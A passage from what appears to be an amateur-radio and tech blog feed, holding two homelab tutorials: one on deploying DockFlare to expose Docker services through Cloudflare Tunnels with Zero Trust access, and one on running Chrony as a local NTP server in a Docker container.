• User-Friendly UI: Visualize tunnels, view logs, and manage configurations in a web dashboard.
• DevOps Ready: Works seamlessly in CI/CD pipelines or home labs.

How to Install DockFlare

Requirements

• Docker and Docker Compose
• A Cloudflare account
• A domain connected to Cloudflare
• A Cloudflare API Token with:
  • Zone DNS edit
  • Zero Trust policy management
  • Tunnel management

Step 1: Create Your Project Directory

mkdir dockflare && cd dockflare

Step 2: Create .env File

Create a file named .env with the following contents:

CLOUDFLARE_API_TOKEN=your_token_here
CLOUDFLARE_ACCOUNT_ID=your_account_id
CLOUDFLARE_ZONE_ID=your_zone_id
TZ=Asia/Kuala_Lumpur

Keep this file private!

Step 3: Create docker-compose.yml

version: '3.8'

services:
  dockflare:
    image: alplat/dockflare:stable
    container_name: dockflare
    restart: unless-stopped
    env_file:
      - .env
    ports:
      - "5000:5000"
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock:ro
      - dockflare_data:/app/data
    labels:
      - cloudflare.tunnel.enable=true
      - cloudflare.tunnel.hostname=dockflare.yourdomain.com
      - cloudflare.tunnel.service=http://dockflare:5000

volumes:
  dockflare_data:

Step 4: Deploy DockFlare

docker compose up -d

Access the UI: http://localhost:5000

Exposing a Docker Service

Here’s an example of exposing a service like myapp running on port 8080:

services:
  myapp:
    image: myapp:latest
    labels:
      cloudflare.tunnel.enable: "true"
      cloudflare.tunnel.hostname: "app.yourdomain.com"
      cloudflare.tunnel.service: "http://myapp:8080"
      cloudflare.tunnel.access.policy: "authenticate"
      cloudflare.tunnel.access.allowed_idps: "your-idp-uuid"

This will automatically:

• Create a Cloudflare Tunnel
• Point your subdomain to it
• Enforce secure login

Add Non-Docker Services

Want to expose your home router or NAS?

1. Go to DockFlare UI.
2. Click “Add Hostname”.
3. Enter:
   • Hostname (e.g., nas.yourdomain.com)
   • Internal IP/port
   • Access policy (bypass/authenticate)
4. Done!

This works for any service, not just Docker.

Configuring Zero Trust Access

To secure your services:

• Go to Cloudflare Zero Trust dashboard
• Add an identity provider (Google, GitHub, etc.)
• Use the IDP UUID in your container labels
• Example:

cloudflare.tunnel.access.policy: authenticate
cloudflare.tunnel.access.allowed_idps: abc123-def456
cloudflare.tunnel.access.session_duration: 8h

Advanced Tips

• Expose multiple hostnames:
  cloudflare.tunnel.hostname=api.domain.com,admin.domain.com
• Customize session duration:
  cloudflare.tunnel.access.session_duration=12h
• Monitor logs via the web UI or docker logs dockflare

Resources

• GitHub: ChrispyBacon-dev/DockFlare
• Docker Compose Docs: docker.com/compose
• Cloudflare Tunnels Guide: developers.cloudflare.com

Conclusion

DockFlare is a game-changer for developers, sysadmins, and homelabbers who want an easy, secure, and automated way to expose their applications to the web. With support for Cloudflare Tunnels, Zero Trust Access, DNS automation, and a clean UI—it’s the only tool you’ll need to publish your services safely.

No more port forwarding. No more SSL headaches.

Just Docker + DockFlare + Cloudflare = Done.

The post DockFlare: Securely Expose Docker Services with Cloudflare Tunnels appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

In a local network where you want to keep your devices synchronized with accurate time, running a lightweight and efficient NTP server is essential. Chrony, a modern alternative to ntpd, is a great choice and in this guide, I’ll show you how to set it up inside a Docker container that fetches time from global sources and distributes it across your LAN.

Why Chrony?

Chrony is:

• More accurate than ntpd in many conditions (especially with intermittent connectivity)
• Lightweight and easy to configure
• Ideal for both clients and servers

What You’ll Set Up

• A Docker container running Chrony
• Configured to sync with global NTP servers
• Act as a time server for your LAN
• With optional logging and control access

Step 1: Create a Dockerfile for Chrony

Start by creating a simple Dockerfile to build a minimal Chrony container.

# Dockerfile
FROM debian:stable-slim

RUN apt-get update && \
    apt-get install -y chrony && \
    apt-get clean && \
    rm -rf /var/lib/apt/lists/*

COPY chrony.conf /etc/chrony/chrony.conf

EXPOSE 123/udp

CMD ["chronyd", "-d", "-f", "/etc/chrony/chrony.conf"]

Step 2: Create the chrony.conf

Here’s a sample chrony.conf tailored for local server use and syncing with global time sources:

# chrony.conf

# Time sources (use pool.ntp.org or your regional servers)
server 0.pool.ntp.org iburst
server 1.pool.ntp.org iburst
server 2.pool.ntp.org iburst

# Allow all clients on your LAN (edit this according to your subnet)
allow 192.168.1.0/24

# Local stratum fallback if Internet is down
local stratum 10

# Drift file to track clock error over time
driftfile /var/lib/chrony/chrony.drift

# Log tracking data
log tracking measurements statistics

# Log files location
logdir /var/log/chrony

# Optional: control access
cmdport 0  # Use 0 to disable remote control; use 323 if needed

Replace 192.168.1.0/24 with your actual LAN subnet.

Step 3: Build and Run the Docker Container

docker build -t chrony-server .

Now run the container with:

docker run -d \
  --name chrony \
  --restart unless-stopped \
  --network host \
  --cap-add=NET_BIND_SERVICE \
  chrony-server

Explanation:

• --network host allows the container to bind directly to port 123/UDP
• --cap-add=NET_BIND_SERVICE is required to bind to low-numbered ports like 123

Step 4: Test Your NTP Server

From a client machine on your LAN:

ntpdate -q <chrony-server-ip>

or

chronyc sources -a

You should see that the time is being served and synchronized.

Optional: Run as a Local Time Authority

If you want to run fully offline, or ensure internal time continuity even without internet:

1. Remove the server lines from chrony.conf
2. Set: local stratum 8
3. Start the server with a stable internal clock source

This makes your Chrony instance a local time authority for your network.

Firewall Notes

Make sure UDP port 123 is allowed inbound from your LAN on your Docker host:

sudo ufw allow proto udp from 192.168.1.0/24 to any port 123

Or for iptables:

iptables -A INPUT -p udp -s 192.168.1.0/24 --dport 123 -j ACCEPT

Conclusion

With this setup, you’ve created a portable, containerized NTP server using Chrony that:

• Syncs with global servers
• Serves accurate time to all local devices
• Works even if your external internet connection drops

Perfect for homelabs, IoT networks, or offline environments.

The post How to Set Up Chrony as a Local NTP Server Using Docker appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.